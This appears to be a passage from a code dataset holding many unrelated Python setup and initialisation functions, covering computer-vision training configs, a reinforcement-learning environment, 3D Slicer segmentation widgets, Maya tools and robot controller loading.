cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128 # default: 512\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = 78\n\n # configs for testing\n # cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_final.pth\")\n if args.small_vidor: # cfg.DATASETS.VIDOR.SIZE == 'small':\n cfg.DATASETS.TEST = (\"vidor_small_val\",)\n elif args.small_vidor_10imgs: # cfg.DATASETS.VIDOR.SIZE == 'small-10imgs':\n cfg.DATASETS.TEST = (\"vidor_small_10imgs_val\",)\n else:\n cfg.DATASETS.TEST = (\"vidor_large_val\",)\n # cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5\n\n # cfg.OUTPUT_DIR = './output/train_vidor_with_pseudo_labels'\n \n \n if not args.eval_only:\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n cfg.freeze()\n default_setup(cfg, args)\n return cfg", "def __init__(self,config = None):\n \n self.join_path = join_path\n self.label_path = cfg['labels_path']\n self.pick_path = (cfg['result_path'] + cfg['pickle_path'])\n self.label_dir = os.path.join(CWD_PATH,self.join_path, self.label_path)\n\n #Variables inherent to the Fluent data: \n self.num_ins = 4\n\n self.scale_var = cfg['scale_var']\n # User set values are below. 
These can be adjusted in config.yml \n self.MSE_thresh1 = (cfg['thresh1']*self.scale_var)**2\n self.MSE_thresh2 = (cfg['thresh2']*self.scale_var)**2\n self.MSE_thresh3 = (cfg['thresh3']*self.scale_var)**2\n \n self.rew_goal = cfg['reward'] * self.scale_var\n\n self.noise = cfg['noise']\n self.minmaxbuffer = cfg['minmaxbuffer']\n\n # Get the function of input-output mapping, and max & min:\n [self.O_CH4_flow_uniformity, mins,maxes] = self.get_funcs('O_CH4_flow_uniformity')\n [self.O_CH4_mol_frac, mins,maxes] = self.get_funcs('O_CH4_mol_frac')\n [self.O_t, mins, maxes] = self.get_funcs('O_t')\n \n self.mins = mins# * self.scale_var\n self.maxes = maxes#* self.scale_var\n #Action range is a percentage of the total range\n self.action_range = cfg['action_range']*self.scale_var\n\n #Action space is the up & down range for the 4 actions \n self.action_space = Box(-self.action_range, self.action_range, shape=(self.num_ins,), dtype=np.float32)\n\n # For ref, this is a 10d state space:\n #in: 1 ch4 flow, 2 ch4 t, 3 o2 flow, 4 o2 t,\n #out: 5 flow unif, 6 mol frac, 7 temp\n #out - target: 8 flow unif, 9 mol frac, 10 temp\n \n self.observation_space = Tuple((Box(self.mins.values[0],self.maxes.values[0],shape=(1,), dtype=np.float32),\n Box(self.mins.values[1],self.maxes.values[1],shape=(1,), dtype=np.float32),\n Box(self.mins.values[2],self.maxes.values[2],shape=(1,), dtype=np.float32),\n Box(self.mins.values[3],self.maxes.values[3],shape=(1,), dtype=np.float32),\n Box(self.mins.values[4],self.maxes.values[4],shape=(1,), dtype=np.float32),\n Box(self.mins.values[5],self.maxes.values[5],shape=(1,), dtype=np.float32),\n Box(self.mins.values[6],self.maxes.values[6],shape=(1,), dtype=np.float32),\n Box(self.mins.values[4],self.maxes.values[4],shape=(1,), dtype=np.float32),\n Box(self.mins.values[5],self.maxes.values[5],shape=(1,), dtype=np.float32),\n Box(self.mins.values[6],self.maxes.values[6],shape=(1,), dtype=np.float32)))\n \n # TODO this isn't really a proper gym spec\n self._spec = lambda: None\n self._spec.id = \"AllVar-v0\"\n \n # For rendering:\n self.viewer = None\n self.labels = cfg['labels']\n \n #initialize variables for tracking:\n self.episode = 0\n self.reward = 0\n self.reset()", "def __init__(self, cfg_index, conditions, pars_dir, step_title, use_defaults, input_cfg_json_data):\n super().__init__(cfg_index, conditions, pars_dir, step_title, use_defaults, input_cfg_json_data)\n self.set_name = \"alignment\"\n if input_cfg_json_data:\n self._read_custom_pars()\n else:\n self._combine_conditions()", "def init_vars():\n\tda_vinci.base.usepackage(\"pgfkeys\")\n\tda_vinci.base.add_preamble(setup_script)", "def setup_flags(self):\n self.io_args.color = self.io_args.color_full\n self.io_args.rig_in = self.io_args.rig\n self.io_args.matches = os.path.join(self.io_args.output_root, \"matches.json\")\n self.io_args.rig_out = os.path.join(self.io_args.output_root, \"rig.json\")", "def init_trainers(self, args):\n self.actors_cur = [None for _ in range(self.num_agents)]\n self.critics_cur = [None for _ in range(self.num_agents)]\n self.actors_tar = [None for _ in range(self.num_agents)]\n self.critics_tar = [None for _ in range(self.num_agents)]\n self.optimizers_c = [None for _ in range(self.num_agents)]\n self.optimizers_a = [None for _ in range(self.num_agents)]\n input_size_global = sum(self.obs_shape_n) + sum(self.action_shape_n)\n\n if args.restore == True: # restore the model\n game_step = int(args.old_model_name.split('_')[-1][:-1])\n for idx in range(self.num_agents):\n self.actors_cur[idx] 
= torch.load(args.old_model_name+'a_c_{}.pt'.format(idx))\n            self.actors_tar[idx] = torch.load(args.old_model_name+'a_t_{}.pt'.format(idx))\n            self.critics_cur[idx] = torch.load(args.old_model_name+'c_c_{}.pt'.format(idx))\n            self.critics_tar[idx] = torch.load(args.old_model_name+'c_t_{}.pt'.format(idx))\n            self.optimizers_a[idx] = optim.Adam(self.actors_cur[idx].parameters(), args.lr_a)\n            self.optimizers_c[idx] = optim.Adam(self.critics_cur[idx].parameters(), args.lr_c)\n            self.var = self.var - (game_step-args.learning_start_episode*args.per_episode_max_len)*args.var_discount\n            self.var = self.min_var if self.var < self.min_var else self.var\n            old_data = {'game_step':game_step, 'episode_gone_old':int(game_step/args.per_episode_max_len)}\n\n        # Note: if you need to load an old model, there should be a procedure for judging whether trainers[idx] is None\n        for i in range(self.num_agents):\n            self.actors_cur[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n                args).to(args.device)\n            self.critics_cur[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n                args).to(args.device)\n            self.actors_tar[i] = actor_agent(self.obs_shape_n[i], self.action_shape_n[i], \\\n                args).to(args.device)\n            self.critics_tar[i] = critic_agent(sum(self.obs_shape_n), sum(self.action_shape_n), \\\n                args).to(args.device)\n            self.optimizers_a[i] = optim.Adam(self.actors_cur[i].parameters(), args.lr_a)\n            self.optimizers_c[i] = optim.Adam(self.critics_cur[i].parameters(), args.lr_c)\n\n        # return the old data, no need to update the trainers\n        if args.restore == True: return old_data\n\n        self.actors_tar = self.update_trainers(self.actors_cur, self.actors_tar, 1.0) # update the target network parameters using the current ones\n        self.critics_tar = self.update_trainers(self.critics_cur, self.critics_tar, 1.0) # update the target network parameters using the current ones
logger.warning('WARN: fix_embeddings set to False '\n 'as embeddings are random.')\n args.fix_embeddings = False\n return args", "def fill_args(args):\n args.agent_module = 'dstar_sgolam_walker'\n args.checkpoint_path = None\n args.exp_config = 'configs/baselines/dstar_proto_sgolam.yaml'\n args.num_episodes = 25\n \n return args", "def addControl(*args):", "def addControl(*args):", "def addControl(*args):", "def addControl(*args):", "def add_source_achors():\n pass", "def __init__(self, parent=None):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None", "def __init__(self, parent=None):\n ScriptedLoadableModuleWidget.__init__(self, parent)\n VTKObservationMixin.__init__(self) # needed for parameter node observation\n self.logic = None\n self._parameterNode = None\n self.T1_LLN_Node = None\n self.T1_LLE_Node = None\n self.ECVMapNode = None\n self.LLE_Node = None\n self.LLN_Node = None\n self.ArefNode = None\n self.T1_LLE_Name = 'T1 Enhanced'\n self.T1_LLN_Name = 'T1 Native'\n self.ResetSliceViews()\n self.LinkSlices()\n self.ColorBarEnabled()\n self.setupVolumeNodeViewLayout()\n self.Warning = True", "def controls_setup(self):\n pass", "def load_defaults(self):\n self.set_motor_limits(self.MOTOR_LEFT, self.LEFT_DEFAULT)\n self.set_motor_limits(self.MOTOR_RIGHT, self.RIGHT_DEFAULT)\n self.set_servo(self.SERVO_1, self.MIDPOINT)", "def load_defaults(self):\n self.set_motor_limits(self.MOTOR_LEFT, self.LEFT_DEFAULT)\n self.set_motor_limits(self.MOTOR_RIGHT, self.RIGHT_DEFAULT)\n self.set_servo(self.SERVO_1, self.MIDPOINT)", "def load_defaults(self):\n self.set_motor_limits(self.MOTOR_LEFT, self.LEFT_DEFAULT)\n self.set_motor_limits(self.MOTOR_RIGHT, self.RIGHT_DEFAULT)\n self.set_servo(self.SERVO_1, self.MIDPOINT)", "def __init__(self, *args, **kwargs):\n super(MayaScene, self).__init__(*args, **kwargs)", "def onReset(self):\n #productive\n profprint()\n fileName = pathToScene = slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\",\"Config/default.cfg\")\n self.logic.loadParameters(fileName)", "def setup(self) -> None:\n mlflow.set_tracking_uri('file://' + hutils.get_original_cwd() + '/mlruns')\n if self.log_mlflow:\n mlflow.set_experiment(self.config.runner.exp_name)\n \n if self.log_mlflow:\n self.log_parameters(self.config)\n mlflow.log_param('node', os.uname()[1])", "def setUp(params, spec):\n\n if not params['fkSkeleton']:\n joints = []\n\n for x in range(params['numberOfSegments']):\n jnt = cmds.createNode('joint')\n jnt = cmds.rename(jnt, '{baseName}{index}_{JNT}'.format(baseName=spec.name, index=x, JNT=JNT)).split('|')[-1]\n if x > 0:\n cmds.parent(jnt, joints[x - 1])\n cmds.setAttr('{node}.translateY'.format(node=jnt), 1.0)\n joints.append(jnt)\n\n spec.params()['fkSkeleton'] = dragonfly.node.dfNode.fromList(joints)\n\n if not params['fkControls']:\n controls = []\n\n for x in range(params['fkNumberOfSegments']):\n ctl = cmds.curve(**CONTROL_SHAPE_DATA)\n cmds.controller(ctl)\n ctl = cmds.rename(ctl, '{baseName}{index}_{CTL}'.format(baseName=spec.name, index=x, CTL=CTL))\n match_nodes(params['fkSkeleton'][x].name(), ctl)\n if x > 0:\n cmds.parent(ctl, controls[x-1])\n controls.append(ctl)\n\n spec.params()['fkControls'] = dragonfly.node.dfNode.fromList(controls)", "def setupOptionsFrame(self):\n\n # CPU / CUDA options\n self.device.addItems([\"cuda\", \"cpu\"])\n self.scriptedEffect.addLabeledOptionsWidget(\"Device:\", self.device)\n\n self.modality.addItems([\"CT\", \"MRI\"])\n 
self.scriptedEffect.addLabeledOptionsWidget(\"Modality:\", self.modality)\n\n # Add ROI options\n self.roiSelector.nodeTypes = ['vtkMRMLMarkupsROINode']\n self.roiSelector.noneEnabled = True\n self.roiSelector.setMRMLScene(slicer.mrmlScene)\n self.scriptedEffect.addLabeledOptionsWidget(\"ROI: \", self.roiSelector)\n\n # Toggle ROI visibility button\n toggleROIVisibilityButton = qt.QPushButton(\"Toggle ROI Visibility\")\n toggleROIVisibilityButton.objectName = self.__class__.__name__ + 'ToggleROIVisibility'\n toggleROIVisibilityButton.setToolTip(\"Toggle selected ROI visibility\")\n toggleROIVisibilityButton.connect('clicked()', self.toggleROIVisibility)\n self.scriptedEffect.addOptionsWidget(toggleROIVisibilityButton)\n\n # Apply button\n applyButton = qt.QPushButton(\"Apply\")\n applyButton.objectName = self.__class__.__name__ + 'Apply'\n applyButton.setToolTip(\"Extract liver from input volume\")\n applyButton.connect('clicked()', self.onApply)\n self.scriptedEffect.addOptionsWidget(applyButton)", "def setup(self, path_to_conf_file):\n\n self.track = Track.SENSORS\n self.num_frames = 0\n\n with open(path_to_conf_file, 'r') as f:\n config = yaml.safe_load(f)\n\n for key, value in config.items():\n setattr(self, key, value)\n\n self.device = torch.device('cuda')\n\n self.image_model = CameraModel(config).to(self.device)\n self.image_model.load_state_dict(torch.load(self.main_model_dir))\n self.image_model.eval()\n\n self.vizs = []\n\n self.waypointer = None\n\n if self.log_wandb:\n wandb.init(project='carla_evaluate')\n \n self.steers = torch.tensor(np.linspace(-self.max_steers,self.max_steers,self.num_steers)).float().to(self.device)\n self.throts = torch.tensor(np.linspace(0,self.max_throts,self.num_throts)).float().to(self.device)\n\n self.prev_steer = 0\n self.lane_change_counter = 0\n self.stop_counter = 0", "def setup(self):\n ScriptedLoadableModuleWidget.setup(self)\n\n globalPath, _ = os.path.split( os.path.splitext( slicer.modules.regularizedfastmarching.path )[0] )\n self.globalPath = globalPath + \"/Resources/SegmentationFastMarching/\"\n self.volumesPath = self.globalPath + \"Volumes/\"\n self.seedsCsvPath = self.globalPath + \"SeedsLabels/\"\n self.seedsPath = self.globalPath + \"Seeds/\"\n self.regularizationsPath = self.globalPath + \"Regularizations/\"\n self.segmentationsPath = self.globalPath + \"Segmentations/\"\n\n self.logic = RegularizedFastMarchingLogic()\n # self.logic.previousVolumeName = None\n # self.logic.imgLabel = np.array([])\n # self.logic.previousImgIds = np.array([])\n # self.logic.imgDist = np.array([])\n\n # Hide the Slicer Logo to increase space\n slicer.util.findChild(slicer.util.mainWindow(), 'LogoLabel').visible = False\n \n #\n #region Restart Slicer Area\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Reload\"\n self.layout.addWidget(parametersCollapsibleButton)\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n self.restartSlicerButton = qt.QPushButton(\"Restart Slicer\")\n self.restartSlicerButton.connect('clicked(bool)', slicer.util.restart)\n parametersFormLayout.addRow(self.restartSlicerButton)\n #endregion \n\n #\n #region Load Data Area\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = \"Seeds\"\n self.layout.addWidget(parametersCollapsibleButton)\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n \n #\n # File name volume .nii\n # \n # self.volueNameComboBox = qt.QComboBox() \n # 
self.volueNameComboBox = self.fillComboBox(self.volueNameComboBox, self.volumesPath, \".nii\")\n # parametersFormLayout.addRow(\"Volumes .nii: \", self.volueNameComboBox)\n \n #\n # Load volume buttons\n #\n # horizontalLayout = qt.QHBoxLayout()\n # self.loadBrainVolumeButton = qt.QPushButton(\"Load Example Volume\")\n # self.loadBrainVolumeButton.enabled = True\n # horizontalLayout.addWidget(self.loadBrainVolumeButton)\n \n #\n # Load custom volumes buttons\n #\n # self.loadCustomVolumeButton = qt.QPushButton(\"Load Selected Volume\")\n # self.loadCustomVolumeButton.enabled = True\n # horizontalLayout.addWidget(self.loadCustomVolumeButton) \n # parametersFormLayout.addRow(horizontalLayout)\n \n \n #\n # Add vertical spacing\n # \n # verticalSpacer = qt.QSpacerItem(0, 20, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n # parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Seeds files and a text line to load / save seeds from the scene\n #\n horizontalLayout = qt.QHBoxLayout()\n fileNameSeedsLabel = qt.QLabel(\"Seeds: \")\n self.fileNameSeedsComboBox = qt.QComboBox() \n self.fileNameSeedsComboBox = self.fillComboBox(self.fileNameSeedsComboBox, self.seedsPath, \".seed\") \n self.fileNameSeedsLineEdit = qt.QLineEdit()\n horizontalLayout.addWidget(fileNameSeedsLabel)\n horizontalLayout.addWidget(self.fileNameSeedsComboBox)\n horizontalLayout.addWidget(self.fileNameSeedsLineEdit)\n self.fileNameSeedsComboBox.currentTextChanged.connect(self.setSelectedSeedsFile)\n self.setSelectedSeedsFile(self.fileNameSeedsComboBox.currentText)\n parametersFormLayout.addRow(horizontalLayout)\n \n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 20, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Save markers Button\n #\n horizontalLayout = qt.QHBoxLayout()\n self.saveMarkersButton = qt.QPushButton(\"Save markers\")\n self.saveMarkersButton.toolTip = \"Save the markers in a fcsv file\"\n self.saveMarkersButton.enabled = True\n horizontalLayout.addWidget(self.saveMarkersButton)\n \n #\n # Load markers Button\n #\n self.loadMarkersButton = qt.QPushButton(\"Load markers\")\n self.loadMarkersButton.toolTip = \"Load the markers from fcsv file.\"\n self.loadMarkersButton.enabled = True\n horizontalLayout.addWidget(self.loadMarkersButton) \n \n #\n # Clear markups Button\n #\n self.clearButton = qt.QPushButton(\"Clear all markups\")\n self.clearButton.toolTip = \"Remove all fiducial markers.\"\n self.clearButton.enabled = True\n horizontalLayout.addWidget(self.clearButton)\n parametersFormLayout.addRow(horizontalLayout)\n \n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 25, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Fiducial placement button\n #\n \"\"\"\n Add this markup in the markupsList and rename it depending on seeds combobox's value\n \"\"\"\n @vtk.calldata_type(vtk.VTK_INT)\n def onMarkupAdded(caller, event, index): \n markupsNode = caller\n # Label, Name\n seedTokens = self.currentSeedNameComboBox.currentText.replace(\" \", \"\").split(\":\")\n markupsNode.SetNthFiducialLabel(index, seedTokens[1])\n markupsNode.SetNthControlPointDescription(index, seedTokens[0])\n \n self.w=slicer.qSlicerMarkupsPlaceWidget()\n self.w.setMRMLScene(slicer.mrmlScene)\n \n markupsNode = slicer.mrmlScene.GetFirstNodeByName(\"MarkupsFiducial\")\n if markupsNode == None: \n markupsNode = slicer.mrmlScene.AddNewNodeByClass(\"vtkMRMLMarkupsFiducialNode\")\n 
markupsNode.CreateDefaultDisplayNodes()\n        \n        # On markup added event: format the added markup\n        markupsNode.AddObserver(slicer.vtkMRMLMarkupsNode.PointPositionDefinedEvent, onMarkupAdded)\n        self.w.setCurrentNode(markupsNode)\n        # Hide all buttons and only show place button\n        self.w.buttonsVisible=True\n        self.w.placeButton().show()\n        self.w.show()\n        parametersFormLayout.addRow(self.w)\n        \n        #\n        # Add vertical spacing\n        # \n        verticalSpacer = qt.QSpacerItem(0, 20, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n        parametersFormLayout.addItem(verticalSpacer)\n        \n        #\n        # File name of the seeds data\n        # \n        self.fileNameDataComboBox = qt.QComboBox() \n        self.fileNameDataComboBox = self.fillComboBox(self.fileNameDataComboBox, self.seedsCsvPath, \".csv\") \n        self.fileNameDataComboBox.currentTextChanged.connect(self.setSeedsLabelFromFile)\n        parametersFormLayout.addRow(\"Seeds labels csv: \", self.fileNameDataComboBox)\n\n        #\n        # Add vertical spacing\n        # \n        verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n        parametersFormLayout.addItem(verticalSpacer)\n        \n        horizontalLayout = qt.QHBoxLayout()\n        # Seeds label \n        self.seedsLabelText = qt.QLabel()\n        self.seedsLabelText.text = \"Labels:\"\n        horizontalLayout.addWidget(self.seedsLabelText)\n        \n        # ComboBox containing names and labels\n        self.currentSeedNameComboBox= qt.QComboBox()\n        \n        # Add labels depending on first csv file found\n        self.setSeedsLabelFromFile(self.fileNameDataComboBox.currentText)\n        horizontalLayout.addWidget(self.currentSeedNameComboBox)\n        \n        self.clearOrganButton = qt.QPushButton(\"Clear this organ\")\n        self.clearOrganButton.toolTip = \"Remove all fiducial markers for this organ.\"\n        self.clearOrganButton.enabled = True\n        horizontalLayout.addWidget(self.clearOrganButton)\n        parametersFormLayout.addRow(horizontalLayout)\n        \n        #endregion\n\n\n        #\n        #region Segmentation Parameters Area\n        #\n        parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n        parametersCollapsibleButton.text = \"Parameters\"\n        self.layout.addWidget(parametersCollapsibleButton)\n        parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n\n        #\n        # input volume selector\n        #\n        self.inputSelector = slicer.qMRMLNodeComboBox()\n        self.inputSelector.nodeTypes = [\"vtkMRMLScalarVolumeNode\"]\n        self.inputSelector.selectNodeUponCreation = True\n        self.inputSelector.addEnabled = False\n        self.inputSelector.removeEnabled = False\n        self.inputSelector.noneEnabled = False\n        self.inputSelector.showHidden = False\n        self.inputSelector.showChildNodeTypes = False\n        self.inputSelector.setMRMLScene( slicer.mrmlScene )\n        self.inputSelector.setToolTip( \"Pick the input to the algorithm.\" )\n        parametersFormLayout.addRow(\"Input Volume: \", self.inputSelector)\n\n        #\n        # Add vertical spacing\n        # \n        verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n        parametersFormLayout.addItem(verticalSpacer)\n        \n        #\n        # Segmentation distance to stop the algorithm\n        #\n        self.distance = ctk.ctkSliderWidget()\n        self.distance.singleStep = 10\n        self.distance.minimum = 0\n        self.distance.maximum = 1000\n        self.distance.value = 100\n        self.distance.setToolTip(\"Set the maximum geodesic distance allowed from a seed\")\n        parametersFormLayout.addRow(\"Distance\", self.distance)\n        \n        #\n        # Margin to build masks\n        #\n        self.marginMask = ctk.ctkSliderWidget()\n        self.marginMask.singleStep = 1\n        self.marginMask.minimum = 0\n        self.marginMask.maximum = 50\n        self.marginMask.value = 15\n        self.marginMask.setToolTip(\"Margin used to build masks for each seed\")\n        
parametersFormLayout.addRow(\"Mask Margin (voxel)\", self.marginMask)\n\n #\n # Gamma to prevent the seeds to cross bridges between organs\n #\n self.gammaSlider = qt.QSlider(qt.Qt.Horizontal)\n self.gammaSlider.setRange(0, 1000)\n self.gammaSlider.setSingleStep(1)\n self.gammaSlider.setPageStep(10)\n self.gammaSlider.setValue(25)\n\n self.gammaSpinBox = qt.QDoubleSpinBox()\n self.gammaSpinBox.setDecimals(3)\n self.gammaSpinBox.setRange(0, 1)\n self.gammaSpinBox.setSingleStep(0.001)\n self.gammaSpinBox.setValue(0.025)\n\n self.gammaSlider.valueChanged.connect(self.setGammaValueFromSlider)\n self.gammaSpinBox.valueChanged.connect(self.setGammaValueFromSpinBox)\n \n horizontalLayout = qt.QHBoxLayout()\n horizontalLayout.addWidget(self.gammaSlider)\n horizontalLayout.addWidget(self.gammaSpinBox)\n\n parametersFormLayout.addRow(\"Regularization weight\", horizontalLayout)\n \n #\n # Regularization radius\n #\n self.regularizationDiameter = ctk.ctkSliderWidget()\n self.regularizationDiameter.singleStep = 1\n self.regularizationDiameter.minimum = 1\n self.regularizationDiameter.maximum = 20\n self.regularizationDiameter.value = 4\n self.regularizationDiameter.setToolTip(\"Margin used to build masks for each seed\")\n parametersFormLayout.addRow(\"Regularization Diameter (voxels)\", self.regularizationDiameter)\n \n #\n # Threshold to prevent the seeds to spread over a range intensities\n #\n self.minThresholdSlider = ctk.ctkSliderWidget()\n self.minThresholdSlider.singleStep = 1\n self.minThresholdSlider.minimum = 0\n self.minThresholdSlider.maximum = 255\n self.minThresholdSlider.value = 40\n self.minThresholdSlider.setToolTip(\"Seeds cannot spread below this value\")\n self.minThresholdSlider.valueChanged.connect(self.setMinThresholdValue)\n parametersFormLayout.addRow(\"Min Threshold (digital level)\", self.minThresholdSlider)\n\n self.maxThresholdSlider = ctk.ctkSliderWidget()\n self.maxThresholdSlider.singleStep = 1\n self.maxThresholdSlider.minimum = 0\n self.maxThresholdSlider.maximum = 255\n self.maxThresholdSlider.value = 255\n self.maxThresholdSlider.setToolTip(\"Seeds cannot spread over this value\")\n self.maxThresholdSlider.valueChanged.connect(self.setMaxThresholdValue)\n parametersFormLayout.addRow(\"Max Threshold (digital level)\", self.maxThresholdSlider)\n\n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Check box to keep or not last segmentation\n #\n self.removeLastSegmentationCheckBox = qt.QCheckBox(\"\")\n self.removeLastSegmentationCheckBox.setChecked(True)\n parametersFormLayout.addRow(\"Remove last segmentation\", self.removeLastSegmentationCheckBox)\n \n #\n # Show the background seed of the next segmentation\n #\n self.showBackGroundCheckBox = qt.QCheckBox(\"\")\n self.showBackGroundCheckBox.setChecked(False)\n parametersFormLayout.addRow(\"Show background\", self.showBackGroundCheckBox)\n \n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n \n #\n # Segment Button\n #\n self.segmentButton = qt.QPushButton(\"Segment\")\n self.segmentButton.toolTip = \"Run the algorithm.\"\n self.segmentButton.enabled = False\n parametersFormLayout.addRow(self.segmentButton)\n #endregion \n\n #\n #region Load Save segmentations\n #\n parametersCollapsibleButton = ctk.ctkCollapsibleButton()\n parametersCollapsibleButton.text = 
\"Segmentations\"\n self.layout.addWidget(parametersCollapsibleButton)\n parametersFormLayout = qt.QFormLayout(parametersCollapsibleButton)\n\n #\n # Checkbox to save the segmentation using the labels \n #\n self.saveByLabelsCheckBox = qt.QCheckBox(\"\")\n self.saveByLabelsCheckBox.setChecked(True)\n parametersFormLayout.addRow(\"Save by labels\", self.saveByLabelsCheckBox)\n\n #\n # Checkbox to save the segmentation using the voxels intensities \n #\n self.saveByIntensitiesCheckBox = qt.QCheckBox(\"\")\n self.saveByIntensitiesCheckBox.setChecked(False)\n parametersFormLayout.addRow(\"Save by intensities\", self.saveByIntensitiesCheckBox)\n\n #\n # Checkbox to generate segments data \n #\n self.generateDataCsvCheckBox = qt.QCheckBox(\"\")\n self.generateDataCsvCheckBox.setChecked(False)\n parametersFormLayout.addRow(\"Generate segments data CSV\", self.generateDataCsvCheckBox)\n\n\n #\n # Name of the segmentation to save\n #\n self.saveSegmentationName = qt.QLineEdit()\n self.saveSegmentationName.textChanged.connect(self.onSaveSegmentationFileChange)\n parametersFormLayout.addRow(\"Segmentation name:\", self.saveSegmentationName) \n\n #\n # Save segmentationButton Button\n #\n self.saveSegmentationButton = qt.QPushButton(\"Save segmentation\")\n self.saveSegmentationButton.toolTip = \"Save this segmentation with used parameters.\"\n parametersFormLayout.addRow(self.saveSegmentationButton) \n\n #\n # Add vertical spacing\n # \n verticalSpacer = qt.QSpacerItem(0, 30, qt.QSizePolicy.Minimum, qt.QSizePolicy.Expanding)\n parametersFormLayout.addItem(verticalSpacer)\n\n horizontalLayout = qt.QHBoxLayout()\n self.segmentationLoadLabelText = qt.QLabel()\n self.segmentationLoadLabelText.text = \"Segmentation files:\"\n horizontalLayout.addWidget(self.segmentationLoadLabelText)\n \n #\n # Segmentation files \n # \n self.segmentationFilesComboBox = qt.QComboBox() \n self.segmentationFilesComboBox = self.fillComboBox(self.segmentationFilesComboBox, self.segmentationsPath, \".seg.nrrd\")\n horizontalLayout.addWidget(self.segmentationFilesComboBox)\n parametersFormLayout.addRow(horizontalLayout)\n \n #\n # Load segmentationButton Button\n #\n self.loadSegmentationButton = qt.QPushButton(\"Load segmentation\")\n self.loadSegmentationButton.toolTip = \"Load the segmenation from this file.\"\n parametersFormLayout.addRow(self.loadSegmentationButton) \n #end region\n \n\n #\n #region Connections & Shortcuts\n #\n # self.loadBrainVolumeButton.connect('clicked(bool)', self.onLoadBrainVolumeButton)\n # self.loadCustomVolumeButton.connect('clicked(bool)', self.onLoadCustomVolumeButton)\n \n self.clearButton.connect('clicked(bool)', self.onClearButton)\n self.clearOrganButton.connect('clicked(bool)', self.onClearOrganButton)\n self.segmentButton.connect('clicked(bool)', self.onSegmentButton)\n self.saveSegmentationButton.connect('clicked(bool)', self.onSaveSegmentationButton)\n self.loadSegmentationButton.connect('clicked(bool)', self.onLoadSegmentationButton)\n self.saveMarkersButton.connect('clicked(bool)', self.onSaveMarkersButton)\n self.loadMarkersButton.connect('clicked(bool)', self.onLoadMarkersButton)\n self.inputSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelect)\n \n # Keyboard shortcut bind: press ctrl button to add markup \n markupShortcut = qt.QShortcut(slicer.util.mainWindow())\n markupShortcut.setKey( qt.QKeySequence(\"w\") )\n markupShortcut.connect('activated()', self.addMarkupcallback)\n \n markupShortcut = qt.QShortcut(slicer.util.mainWindow())\n markupShortcut.setKey( 
qt.QKeySequence(\"x\") )\n markupShortcut.connect('activated()', self.addBgMarkupcallback)\n #endregion \n\n # Refresh Apply button state\n self.onSelect()\n \n # Refresh segmentation save button state\n self.onSaveSegmentationFileChange()", "def init_turn(self):\n sender = self.sender()\n cur_settings = self.setting_dropdown.currentText()\n\n if sender:\n cur_disp = self.rad_grp.checkedButton()\n self.start_frm = self.start_frm_le.text()\n self.end_frm = self.end_frm_le.text()\n file_path = self.save_loc.text()\n if self.arg_check():\n\n wireframe = self.wireframe\n # Instantiate the tool logic with the selected values.\n start_turn = tl.Turntable(cur_disp.objectName(),\n self.start_frm,\n self.end_frm,\n file_path,\n wireframe)\n\n # If discipline is surface, set render settings.\n if cur_disp.objectName() == 'surface':\n set_turn = tl.RenderTurntable()\n set_turn.set_render_settings(cur_settings,self.start_frm,self.end_frm)\n\n start_turn.launch_tool()", "def load_params(self, event):\n \n self.robot_type = rospy.get_param(\"robot_type\" , 'pendulum' )\n self.robot_config = rospy.get_param(\"robot_config\", 'wrist-only' )\n self.robot_ctl = rospy.get_param(\"controller\", 'RfixCTC' )\n self.fixed_mode = rospy.get_param(\"fixed_mode\", 1 )\n \n \n ###############################################\n # Load robot model for the right configuration\n if self.robot_config == 'wrist-only':\n self.R = Proto.SingleRevoluteDSDM()\n \n elif self.robot_config == 'dual-plane' :\n self.R = Proto.TwoPlanarSerialDSDM()\n \n else:\n self.R = None\n \n ###############################################\n # Load controller\n if self.robot_ctl == 'RfixCTC' :\n self.Ctl = RminCTC.RfixComputedTorqueController( self.R , self.fixed_mode )\n \n elif self.robot_ctl == 'RminCTC' :\n self.Ctl = RminCTC.RminComputedTorqueController( self.R )\n \n elif self.robot_ctl == 'RfixSLD' :\n self.Ctl = RminCTC.RfixSlidingModeController( self.R , self.fixed_mode )\n \n elif self.robot_ctl == 'RminSLD' :\n self.Ctl = RminCTC.RminSlidingModeController( self.R )\n \n elif self.robot_ctl == 'RollCTC' :\n self.Ctl = RollCTC.RolloutComputedTorqueController( self.R )\n \n elif self.robot_ctl == 'RollSLD' :\n self.Ctl = 